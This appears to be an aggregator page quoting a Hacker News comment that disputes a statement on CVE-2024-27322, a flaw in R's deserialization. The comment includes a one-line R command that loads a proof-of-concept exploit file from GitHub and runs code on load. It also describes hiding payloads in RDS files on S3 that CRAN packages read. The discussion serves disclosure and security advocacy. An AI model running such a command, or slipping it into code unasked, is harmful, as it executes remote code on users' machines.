Rdaradar Alternatives and Reviews

rdaradar reviews and mentions

Posts with mentions or reviews of rdaradar. We have used some of these posts to build our list of alternatives and similar projects. The last one was on 2024-05-13.

Statement on CVE-2024-27322
2 projects | news.ycombinator.com | 13 May 2024

> We reject the idea that there are wider security implications associated with promises or serialization, both of which are core features of the language.
Isn't this demonstrably false? I.e. run this [1]
load(url("https://github.com/hrbrmstr/rdaradar/raw/main/exploit.rda"))
and it opens the calculator application on windows/macOS (or echo's 'pwnd' on linux).
To me, if someone can easily cause their code to run on my computer, that's a pretty serious vulnerability. read.csv() or fromJSON() do not allow this.
I happen to have packages on CRAN that readRDS() from AWS S3. So if I happen to be evil and make some trivial alterations to those RDS files to contain a hidden payload, well, it's child's play. That does not seem sane to me.
FWIW, my recommendation is that CRAN should create a function like readRDS() that only even reads in data and does not allow any extra code to be run, then only allow that on CRAN. Then if someone did craft a malicious payload, it wouldn't matter. The (harder) alternative would be to disallow any functions that have this remote code execution 'feature', e.g. only read.csv() or fromJSON() and similar.
[1] https://rud.is/b/2024/05/03/cve-2024-27322-should-never-have...